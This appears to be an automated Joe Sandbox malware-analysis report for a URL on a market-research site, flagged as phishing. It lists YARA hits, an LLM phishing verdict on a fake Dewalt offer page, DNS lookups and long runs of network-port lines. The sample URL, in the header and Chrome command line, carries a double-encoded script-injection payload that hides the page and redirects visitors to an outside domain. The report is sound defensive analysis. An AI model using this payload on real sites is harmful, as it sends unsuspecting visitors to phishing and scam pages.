Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%3

Overview

General Information

Sample URL:https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%
Analysis ID:1437716
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Yara detected Phisher
Multimodal LLM detected phishing page
HTML body contains low number of good links
HTML title does not match URL
Stores files to the Windows start menu directory
Suspicious form URL found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25%32%37%25%32%43%25%32%37%25%32%46%25%32%37%25%32%43%25%32%3713%25%32%46139%25%32%448761%25%32%46964%25%32%4418418%25%32%4415995%25%32%37%25%35%44%25%35%42%25%32%37%25%36%41%25%36%46%25%36%39%25%36%45%25%32%37%25%35%44%25%32%38%25%32%37%25%32%37%25%32%39%25%32%39%25%32%43%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%35%42%25%32%37%25%36%32%25%36%46%25%36%34%25%37%39%25%32%37%25%35%44%25%35%42%25%32%37%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%37%25%35%44%25%35%42%25%32%37%25%36%46%25%37%30%25%36%31%25%36%33%25%36%39%25%37%34%25%37%39%25%32%37%25%35%44%25%33%44%25%33%30%25%37%38%25%33%30%25%33%42%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%30 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1860,i,8896414635319004165,15107896085658579415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_193JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_215JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: dropped/chromecache_215, type: DROPPED
      Source: Yara matchFile source: dropped/chromecache_193, type: DROPPED
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48LLM: Score: 7 brands: Dewalt Reasons: The URL 'https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48' contains several red flags typical of phishing sites, including a complex and suspicious query string and an unfamiliar domain name that does not match the official Dewalt domain. The image shows a form requesting personal information, which is a common phishing tactic. The use of urgency ('This offer expires in') and limited stock indicators are social engineering techniques designed to rush the user into making a decision. The security badges displayed are often misused by phishing sites to create a false sense of security.
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Number of links: 0
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Title: Dewalt Tool Set does not match URL
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Form action: ajax.php?method=new_prospect
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Form action: ajax.php?method=new_prospect
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Form action: ajax.php?method=new_prospect
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Form action: ajax.php?method=new_prospect
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: Form action: ajax.php?method=new_prospect
      Source: https://qwartiqpin.online/18caf37202bc2f9e1f8ae9200756c7acHTTP Parser: No favicon
      Source: https://qwartiqpin.online/18caf37202bc2f9e1f8ae9200756c7acHTTP Parser: No favicon
      Source: https://qwartiqpin.online/18caf37202bc2f9e1f8ae9200756c7acHTTP Parser: No favicon
      Source: https://qwartiqpin.online/18caf37202bc2f9e1f8ae9200756c7acHTTP Parser: No favicon
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="author".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="author".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="author".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="author".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="author".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="copyright".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="copyright".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="copyright".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="copyright".. found
      Source: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.16:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.16:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49897 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.146
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
      Source: global trafficDNS traffic detected: DNS query: www.ibisworld.com
      Source: global trafficDNS traffic detected: DNS query: secure.detailsinventivegroup.com
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn-cookieyes.com
      Source: global trafficDNS traffic detected: DNS query: s4wemepl3v-dsn.algolia.net
      Source: global trafficDNS traffic detected: DNS query: ipinfo.io
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: log.cookieyes.com
      Source: global trafficDNS traffic detected: DNS query: imputeletter.com
      Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
      Source: global trafficDNS traffic detected: DNS query: cdn.matomo.cloud
      Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
      Source: global trafficDNS traffic detected: DNS query: qwartiqpin.online
      Source: global trafficDNS traffic detected: DNS query: trk-adulvion.com
      Source: global trafficDNS traffic detected: DNS query: trk-amropode.com
      Source: global trafficDNS traffic detected: DNS query: event.trk-adulvion.com
      Source: global trafficDNS traffic detected: DNS query: unisonroad.com
      Source: global trafficDNS traffic detected: DNS query: subscription.trk-adulvion.com
      Source: global trafficDNS traffic detected: DNS query: api.taboola.com
      Source: global trafficDNS traffic detected: DNS query: jadesglow.com
      Source: global trafficDNS traffic detected: DNS query: www.nrj1hs34m.com
      Source: global trafficDNS traffic detected: DNS query: www.electronixmaster.com
      Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
      Source: global trafficDNS traffic detected: DNS query: extension.trk-amropode.com
      Source: global trafficDNS traffic detected: DNS query: notification.trk-amropode.com
      Source: global trafficDNS traffic detected: DNS query: sc.ec424.com
      Source: global trafficDNS traffic detected: DNS query: pushclk.com
      Source: global trafficDNS traffic detected: DNS query: cdn4image.com
      Source: global trafficDNS traffic detected: DNS query: go-g3t-msg.com
      Source: global trafficDNS traffic detected: DNS query: br.xn846.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
